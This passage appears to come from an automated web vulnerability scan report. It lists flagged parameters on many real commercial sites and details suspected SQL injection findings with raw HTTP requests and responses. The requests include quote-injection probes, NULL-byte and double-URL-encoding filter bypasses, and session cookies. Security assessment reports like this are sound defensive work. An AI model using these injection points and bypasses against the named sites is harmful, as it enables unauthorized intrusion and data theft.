3.305. http://s7d5.scene7.com/is/image/bluestembrands/4ND9630000010_A_999 [REST URL parameter 4]

3.306. http://s7d5.scene7.com/is/image/bluestembrands/4ND9760000010_A_999 [REST URL parameter 4]

3.307. http://s7d5.scene7.com/is/image/bluestembrands/4NF4230000010_A_999 [REST URL parameter 4]

3.308. http://s7d5.scene7.com/is/image/bluestembrands/4NQ3530000010_A_999 [REST URL parameter 4]

3.309. http://s7d5.scene7.com/is/image/bluestembrands/4NR7550000010_VB_999 [REST URL parameter 4]

3.310. http://s7d5.scene7.com/is/image/bluestembrands/4NR7590000010_A_999 [REST URL parameter 4]

3.311. http://s7d5.scene7.com/is/image/bluestembrands/4NR7650000010_A_999 [REST URL parameter 4]

3.312. http://s7d5.scene7.com/is/image/bluestembrands/4NS4490000010_A_999 [REST URL parameter 4]

3.313. http://s7d5.scene7.com/is/image/bluestembrands/4NS961NNUS055_A_999 [REST URL parameter 4]

3.314. http://s7d5.scene7.com/is/image/bluestembrands/4NT0300000010_VA_999 [REST URL parameter 4]

3.315. http://s7d5.scene7.com/is/image/bluestembrands/4NT3360000010_WVA_999 [REST URL parameter 4]

3.316. http://s7d5.scene7.com/is/image/bluestembrands/4NT3380000010_WVA_999 [REST URL parameter 4]

3.317. http://s7d5.scene7.com/is/image/bluestembrands/4NV962NBRS055_A_999 [REST URL parameter 4]

3.318. http://s7d5.scene7.com/is/image/bluestembrands/4NX0280000010_WVA_999 [REST URL parameter 4]

3.319. http://s7d5.scene7.com/is/image/bluestembrands/4NZ2960000010_VA_999 [REST URL parameter 4]

3.320. http://s7d5.scene7.com/is/image/bluestembrands/4NZ3330000010_A_999 [REST URL parameter 4]

3.321. http://s7d5.scene7.com/is/image/bluestembrands/4NZ3340000010_A_999 [REST URL parameter 4]

3.322. http://s7d5.scene7.com/is/image/bluestembrands/4NZ4500000010_VA_999 [REST URL parameter 4]

3.323. http://s7d5.scene7.com/is/image/bluestembrands/4NZ7280000010_VA_999 [REST URL parameter 4]

3.324. http://s7d5.scene7.com/is/image/bluestembrands/F0661_A_999 [REST URL parameter 4]

3.325. http://s7d5.scene7.com/is/image/bluestembrands/F0670_A_999 [REST URL parameter 4]

3.326. http://s7d5.scene7.com/is/image/bluestembrands/F0688_A_999 [REST URL parameter 4]

3.327. http://s7d5.scene7.com/is/image/bluestembrands/F6554_VA_999 [REST URL parameter 4]

3.328. http://s7d5.scene7.com/is/image/bluestembrands/K4267_A_999 [REST URL parameter 4]

3.329. http://s7d5.scene7.com/is/image/bluestembrands/K7544_VA_999 [REST URL parameter 4]

3.330. http://s7d5.scene7.com/is/image/bluestembrands/K8780_A_999 [REST URL parameter 4]

3.331. http://s7d5.scene7.com/is/image/bluestembrands/N9063_VWB_400 [REST URL parameter 4]

3.332. http://s7d5.scene7.com/is/image/bluestembrands/ND821_VA_999 [REST URL parameter 4]

3.333. http://s7d5.scene7.com/is/image/bluestembrands/NE304_A_999 [REST URL parameter 4]

3.334. http://s7d5.scene7.com/is/image/bluestembrands/NI213_WVA_999 [REST URL parameter 4]

3.335. http://s7d5.scene7.com/is/image/bluestembrands/NK993_VA_999 [REST URL parameter 4]

3.336. http://s7d5.scene7.com/is/image/bluestembrands/NL522_A_999 [REST URL parameter 4]

3.337. http://s7d5.scene7.com/is/image/bluestembrands/NR780_VA_999 [REST URL parameter 4]

3.338. http://s7d5.scene7.com/is/image/bluestembrands/NS114_VA_999 [REST URL parameter 4]

3.339. http://s7d5.scene7.com/is/image/bluestembrands/P1016_VA_999 [REST URL parameter 4]

3.340. http://scout.clareitysecurity.com/fj9ga/Sat.ashx [id parameter]

3.341. http://scout.clareitysecurity.com/fj9ga/Sat.ashx [sn parameter]

3.342. https://secure.bhphotovideo.com/find/unsubscribeCatalogs.jsp [REST URL parameter 2]

3.343. https://secure.bhphotovideo.com/find/unsubscribeCatalogs.jsp [REST URL parameter 2]

3.344. https://secure.swissmail.org/Generalmail/Dombox/domreg/dom-check.asp [rg parameter]

3.345. http://server.iad.liveperson.net/hc/70582249/ [divID parameter]

3.346. http://smartparents.com/ [name of an arbitrarily supplied request parameter]

3.347. http://smartparents.com/favicon.ico [name of an arbitrarily supplied request parameter]

3.348. http://sv.liveclicker.net/service/api [var parameter]

3.349. http://sv.liveclicker.net/service/getEmbed [div_id parameter]

3.350. http://sv.liveclicker.net/service/getEmbed [name of an arbitrarily supplied request parameter]

3.351. http://sv.liveclicker.net/service/getEmbed [player_custom_id parameter]

3.352. http://t.p.mybuys.com/webrec/wr.do [ckc parameter]

3.353. http://ts.istrack.com/trackingAPI.js [vti parameter]

3.354. http://voken.eyereturn.com/ [320863&click parameter]

3.355. http://voken.eyereturn.com/pb/get [320863&click parameter]

3.356. http://web.aisle7.net/api/1.0/widgets/general/newswire-widget [jsonpcallback parameter]

3.357. http://www.abesofmaine.com/ [name of an arbitrarily supplied request parameter]

3.358. http://www.abesofmaine.com/category.do [group1 parameter]

3.359. http://www.abesofmaine.com/category.do [name of an arbitrarily supplied request parameter]

3.360. https://www.abesofmaine.com/accountMenu.do [name of an arbitrarily supplied request parameter]

3.361. http://www.armaniexchange.com/search.do [query parameter]

3.362. http://www.fingerhut.com/catalog/search.cmd [keyword parameter]

3.363. http://www.flyingmule.com/Merchant2/merchant.mvc [Page parameter]

3.364. http://www.gnc.com/search/controller.jsp [kw parameter]

3.365. http://www.gnc.com/search/index.jsp [origkw parameter]

3.366. http://www.gnc.com/search/noResults.jsp [origkw parameter]

3.367. http://www.hertzfurniture.com/45-years.html [REST URL parameter 1]

3.368. http://www.hertzfurniture.com/45-years.html [REST URL parameter 1]

3.369. http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html [REST URL parameter 1]

3.370. http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html [REST URL parameter 1]

3.371. http://www.hertzfurniture.com/Library-Furniture--20--no.html [REST URL parameter 1]

3.372. http://www.hertzfurniture.com/Library-Furniture--20--no.html [REST URL parameter 1]

3.373. http://www.hertzfurniture.com/Outdoor-Directories--38--ca.html [REST URL parameter 1]

3.374. http://www.hertzfurniture.com/Outdoor-Directories--38--ca.html [REST URL parameter 1]

3.375. http://www.hertzfurniture.com/Outdoor-Directories--Single-Sided-Alum-Outdoor-Readerboard---Colored--5636--mo.html [REST URL parameter 1]

3.376. http://www.hertzfurniture.com/Outdoor-Directories--Single-Sided-Alum-Outdoor-Readerboard---Colored--5636--mo.html [REST URL parameter 1]

3.377. http://www.hertzfurniture.com/cart.php [REST URL parameter 1]

3.378. http://www.hertzfurniture.com/cart.php [REST URL parameter 1]

3.379. http://www.hertzfurniture.com/cart.php [name of an arbitrarily supplied request parameter]

3.380. http://www.hertzfurniture.com/cart.php [name of an arbitrarily supplied request parameter]

3.381. http://www.hertzfurniture.com/cart.php/1' [REST URL parameter 1]

3.382. http://www.hertzfurniture.com/cart.php/1' [REST URL parameter 1]

3.383. http://www.hertzfurniture.com/cart.php/1' [REST URL parameter 2]

3.384. http://www.hertzfurniture.com/cart.php/1' [REST URL parameter 2]

3.385. http://www.hertzfurniture.com/church-furniture.html [REST URL parameter 1]

3.386. http://www.hertzfurniture.com/church-furniture.html [REST URL parameter 1]

3.387. http://www.hertzfurniture.com/css/ie.css [REST URL parameter 2]

3.388. http://www.hertzfurniture.com/css/ie.css [REST URL parameter 2]

3.389. http://www.hertzfurniture.com/css/ie7.css [REST URL parameter 2]

3.390. http://www.hertzfurniture.com/css/ie7.css [REST URL parameter 2]

3.391. http://www.hertzfurniture.com/css/jqModalDef.css [REST URL parameter 2]

3.392. http://www.hertzfurniture.com/css/jqModalDef.css [REST URL parameter 2]

3.393. http://www.hertzfurniture.com/css/livebar.css [REST URL parameter 2]

3.394. http://www.hertzfurniture.com/css/livebar.css [REST URL parameter 2]

3.395. http://www.hertzfurniture.com/css/modelpage.css [REST URL parameter 2]

3.396. http://www.hertzfurniture.com/css/modelpage.css [REST URL parameter 2]

3.397. http://www.hertzfurniture.com/css/styles.css [REST URL parameter 2]

3.398. http://www.hertzfurniture.com/css/styles.css [REST URL parameter 2]

3.399. http://www.hertzfurniture.com/favicon.ico [REST URL parameter 1]

3.400. http://www.hertzfurniture.com/favicon.ico [REST URL parameter 1]

3.401. http://www.hertzfurniture.com/images/live_person/repoffline.gif [REST URL parameter 3]

3.402. http://www.hertzfurniture.com/images/live_person/repoffline.gif [REST URL parameter 3]

3.403. http://www.hertzfurniture.com/search-complete.php [REST URL parameter 1]

3.404. http://www.hertzfurniture.com/search-complete.php [REST URL parameter 1]

3.405. http://www.hertzfurniture.com/search.php [REST URL parameter 1]

3.406. http://www.hertzfurniture.com/search.php [REST URL parameter 1]

3.407. http://www.hertzfurniture.com/search.php [REST URL parameter 1]

3.408. http://www.hertzfurniture.com/search.php [find-box parameter]

3.409. http://www.hertzfurniture.com/search.php [find-box parameter]

3.410. http://www.hertzfurniture.com/search.php [find-box parameter]

3.411. http://www.hertzfurniture.com/search.php [name of an arbitrarily supplied request parameter]

3.412. http://www.hertzfurniture.com/search.php [name of an arbitrarily supplied request parameter]

3.413. http://www.hertzfurniture.com/search.php [name of an arbitrarily supplied request parameter]

3.414. http://www.infinity-micro.com/ProdDisplay1.asp [CatID parameter]

3.415. http://www.infinity-micro.com/ProdDisplay1.asp [CatID parameter]

3.416. http://www.infinity-micro.com/ProdDisplay1.asp [CatID parameter]

3.417. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [d parameter]

3.418. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [iheight parameter]

3.419. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [iheight parameter]

3.420. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [iwidth parameter]

3.421. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [iwidth parameter]

3.422. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

3.423. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

3.424. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zimg parameter]

3.425. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zzwindow parameter]

3.426. http://www.mcafeestore.com/store [name of an arbitrarily supplied request parameter]

3.427. http://www.mcafeestore.com/store/mfe/DisplayHomePage [name of an arbitrarily supplied request parameter]

3.428. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.da_DK/Currency.DKK [name of an arbitrarily supplied request parameter]

3.429. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.da_DK/Currency.DKK%20 [name of an arbitrarily supplied request parameter]

3.430. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.de_DE [name of an arbitrarily supplied request parameter]

3.431. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.en_AU/Currency.AUD [name of an arbitrarily supplied request parameter]

3.432. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.en_AU/Currency.NZD [name of an arbitrarily supplied request parameter]

3.433. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.en_AU/Currency.NZD%20 [name of an arbitrarily supplied request parameter]

3.434. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.en_HK [name of an arbitrarily supplied request parameter]

3.435. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.fr_FR [name of an arbitrarily supplied request parameter]

3.436. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.it_IT [name of an arbitrarily supplied request parameter]

3.437. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.nl_NL [name of an arbitrarily supplied request parameter]

3.438. http://www.superbiiz.com/detail.php [name of an arbitrarily supplied request parameter]

3.439. http://www.superbiiz.com/detail.php [name parameter]

3.440. http://www.superbiiz.com/shopcart.php [name of an arbitrarily supplied request parameter]

3.441. http://www.superbiiz.com/testimonial_list.php [name of an arbitrarily supplied request parameter]

3.442. https://www.superbiiz.com/signin.php [name of an arbitrarily supplied request parameter]

3.443. https://www.superbiiz.com/signin.php [name of an arbitrarily supplied request parameter]

3.444. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [EdpNo parameter]

3.445. http://www.tigerdirect.ca/cgi-bin/order.asp [EdpNo parameter]

3.446. https://www.tigerdirect.ca/secure/orderlogin.asp [PG parameter]

3.447. http://www.toshibadirect.com/td/b2c/accessories.jsp [name of an arbitrarily supplied request parameter]

3.448. http://www.toshibadirect.com/td/b2c/afin.to [name of an arbitrarily supplied request parameter]

3.449. http://www.toshibadirect.com/td/b2c/laptops.to [name of an arbitrarily supplied request parameter]

3.450. http://www.toshibadirect.com/td/b2c/laptops.to [page parameter]

3.451. http://www.toshibadirect.com/td/b2c/tv.to [name of an arbitrarily supplied request parameter]

3.452. http://www.trustmarker.com/pres [div parameter]

3.453. http://www.trustmarker.com/pres [k parameter]

3.454. http://www.trustmarker.com/pres [k parameter]

3.455. http://subscriptions.marvel.com/confirm/title.AVE [Referer HTTP header]

3.456. http://subscriptions.marvel.com/confirm/title.AVE [Referer HTTP header]

3.457. http://www.abesofmaine.com/ [Referer HTTP header]

3.458. http://www.abesofmaine.com/category.do [Referer HTTP header]

3.459. https://www.abesofmaine.com/accountMenu.do [Referer HTTP header]

3.460. http://www.acehardware.com/ [Referer HTTP header]

3.461. http://www.acehardware.com/home/index.jsp [Referer HTTP header]

3.462. http://www.acehardware.com/product/close.gif [Referer HTTP header]

3.463. http://www.acehardware.com/product/loading.gif [Referer HTTP header]

3.464. https://www.acehardware.com/acerewards/index.jsp [Referer HTTP header]

3.465. http://www.gnc.com/ [Referer HTTP header]

3.466. http://www.gnc.com/home/index.jsp [Referer HTTP header]

3.467. http://www.pacificgeek.com/ [Referer HTTP header]

3.468. http://www.pacificgeek.com/product.asp [Referer HTTP header]

3.469. http://seg.sharethis.com/getSegment.php [__stid cookie]

3.470. http://www.petco.com/ [ResonanceSegment cookie]

3.471. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [90215357_clogin cookie]

3.472. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [Cart cookie]

3.473. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [CartId cookie]

3.474. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [CartSave cookie]

3.475. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [CoreAt cookie]

3.476. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [CoreID6 cookie]

3.477. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [DB cookie]

3.478. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [SessionId cookie]

3.479. http://www.tigerdirect.ca/cgi-bin/order.asp [90215357_clogin cookie]

3.480. http://www.tigerdirect.ca/cgi-bin/order.asp [Cart cookie]

3.481. http://www.tigerdirect.ca/cgi-bin/order.asp [CoreAt cookie]

3.482. http://www.tigerdirect.ca/cgi-bin/order.asp [CoreID6 cookie]

3.483. http://www.tigerdirect.ca/cgi-bin/order.asp [DB cookie]

3.484. http://www.tigerdirect.ca/cgi-bin/order.asp [SessionId cookie]

3.485. http://www.tigerdirect.ca/retailstores/indexca.asp [Cart cookie]

3.486. http://www.tigerdirect.ca/retailstores/indexca.asp [DB cookie]

3.487. http://www.tigerdirect.ca/retailstores/indexca.asp [SessionId cookie]

3.488. http://www.tigerdirect.ca/retailstores/indexca.asp [Warranty cookie]



1. SQL injection
There are 20 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://sales.liveperson.net/hc/52493658/ [lpjson parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/52493658/

Issue detail

The lpjson parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lpjson parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /hc/52493658/?&site=52493658&cmd=mTagInPage&lpCallId=182916069170-434602336725&protV=20&lpjson=1%00'&page=http%3A//www.homedepot.ca/webapp/wcs/stores/servlet/Home%3FstoreId%3D10051%26catalogId%3D10051%26langId%3D-15&id=9974138610&javaSupport=true&visitorStatus=INSITE_STATUS&activePlugin=none&cobrowse=true&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.homedepot.ca/webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=513577902630503747; HumanClickSiteContainerID_52493658=STANDALONE; LivePersonID=-5110247826455-1317384175:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDQACDDARS=OFBNHBNACGJHMEJFOLMPFDFH; HumanClickACTIVE=1317384173871

Response 1

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:04:39 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 30 Sep 2011 12:04:39 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 105

lpConnLib.Process({"ResultSet": {"lpCallId":"182916069170-434602336725","lpCallError":"ERR-NOVISITOR"}});

Request 2

GET /hc/52493658/?&site=52493658&cmd=mTagInPage&lpCallId=182916069170-434602336725&protV=20&lpjson=1%00''&page=http%3A//www.homedepot.ca/webapp/wcs/stores/servlet/Home%3FstoreId%3D10051%26catalogId%3D10051%26langId%3D-15&id=9974138610&javaSupport=true&visitorStatus=INSITE_STATUS&activePlugin=none&cobrowse=true&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.homedepot.ca/webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=513577902630503747; HumanClickSiteContainerID_52493658=STANDALONE; LivePersonID=-5110247826455-1317384175:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDQACDDARS=OFBNHBNACGJHMEJFOLMPFDFH; HumanClickACTIVE=1317384173871

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:04:40 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_52493658=STANDALONE; path=/hc/52493658
Set-Cookie: LivePersonID=-5110247826455-1317384278:-1:1317384259:-1:-1; expires=Sat, 29-Sep-2012 12:04:41 GMT; path=/hc/52493658; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 30 Sep 2011 12:04:41 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"182916069170-434602336725","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

1.2. https://www.mcafeesecure.com/customer/Login.sa [COBRANDID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.mcafeesecure.com
Path:   /customer/Login.sa

Issue detail

The COBRANDID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the COBRANDID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /customer/Login.sa HTTP/1.1
Host: www.mcafeesecure.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.mcafeesecure.com/us/products/buy_now.jsp?tab=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: COBRANDID=0'; affclick=A=84996&C=0; resin=1741316618.20480.0000; LANG=EN; CAMEFROM=shop.mcafee.com; __utma=185732405.1804935129.1315595275.1315779448.1317384067.3; __utmb=185732405.11.10.1317384067; __utmc=185732405; __utmz=185732405.1317384067.3.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=secured%20by%20macafee; adclick=1311-1

Response 1

HTTP/1.1 500 Internal Server Error
Server: ScanAlert
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Type: text/html
Connection: close
Date: Fri, 30 Sep 2011 12:34:59 GMT
Content-Length: 3072


<html>
<head>
<title>McAfee Secure
</title>
<link rel="stylesheet" type="text/css" href="/css/pci-common.css">
<link rel="stylesheet" type="text/css" href="/css/pci.css">

...[SNIP]...

Request 2

GET /customer/Login.sa HTTP/1.1
Host: www.mcafeesecure.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.mcafeesecure.com/us/products/buy_now.jsp?tab=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: COBRANDID=0''; affclick=A=84996&C=0; resin=1741316618.20480.0000; LANG=EN; CAMEFROM=shop.mcafee.com; __utma=185732405.1804935129.1315595275.1315779448.1317384067.3; __utmb=185732405.11.10.1317384067; __utmc=185732405; __utmz=185732405.1317384067.3.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=secured%20by%20macafee; adclick=1311-1

Response 2

HTTP/1.1 302 Found
Server: McAfeeSecure
Location: http://www.mcafeesecure.com/Logout.sa?msgId=9
Content-Length: 83
Connection: close
Date: Fri, 30 Sep 2011 12:34:59 GMT

The URL has moved <a href="http://www.mcafeesecure.com/Logout.sa?msgId=9">here</a>

1.3. http://www.mcafeestore.com/store/mfe/en_GB/buy/productID.237091200 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mcafeestore.com
Path:   /store/mfe/en_GB/buy/productID.237091200

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /store/mfe/en_GB/buy'/productID.237091200 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21859056255,0)
Content-Length: 89067
Date: Fri, 30 Sep 2011 12:44:30 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=AUD&ESIHC=4b937cbd&Env=BASE&Locale=en_AU&SiteID=mfe&StyleID=24160400&StyleVersion=38&ceid=176851100&cename=TopHeader&id=ServerErrorPage&productID=237091200"-->
...[SNIP]...
<pre>com.digitalriver.exception.TrackedSystemException: PRC_000001
   at com.digitalriver.catalog.rules.AddItemToRequisition.doWork(AddItemToRequisition.java:291)
   at com.digitalriver.rules.ActionRule.evaluate(ActionRule.java:41)
   at
...[SNIP]...

Request 2

GET /store/mfe/en_GB/buy''/productID.237091200 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://www.mcafeestore.com/store?''=&Action=buy&Env=BASE&Locale=en_GB&SiteID=mfe&productID=237091200
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=107758402677,0)
Content-Length: 0
Date: Fri, 30 Sep 2011 12:44:31 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close


1.4. http://www.mcafeestore.com/store/mfe/en_GB/home [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mcafeestore.com
Path:   /store/mfe/en_GB/home

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /store/mfe/en_GB%2527/home HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=64808723200,0)
Content-Length: 24329
Date: Fri, 30 Sep 2011 12:44:24 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app62
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=GBP&ESIHC=f7b63e21&Env=BASE&Locale=en_GB&SiteID=mfe&StyleID=24160400&StyleVersion=38&ceid=176851100&cename=TopHeader&id=ServerErrorPage"-->
...[SNIP]...
<pre>com.digitalriver.exception.TrackedSystemException: SIT_000001
   at com.digitalriver.system.controller.SiteflowPlugin.determineNextPage(SiteflowPlugin.java:389)
   at com.digitalriver.system.controller.SiteflowPlugin.handleRequest(
...[SNIP]...

Request 2

GET /store/mfe/en_GB%2527%2527/home HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, private
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Location: https://www.mcafeestore.com/store?%27%27=&Action=en_GB&Env=BASE&Locale=en_GB&SiteID=mfe&home=
Content-Type: text/plain
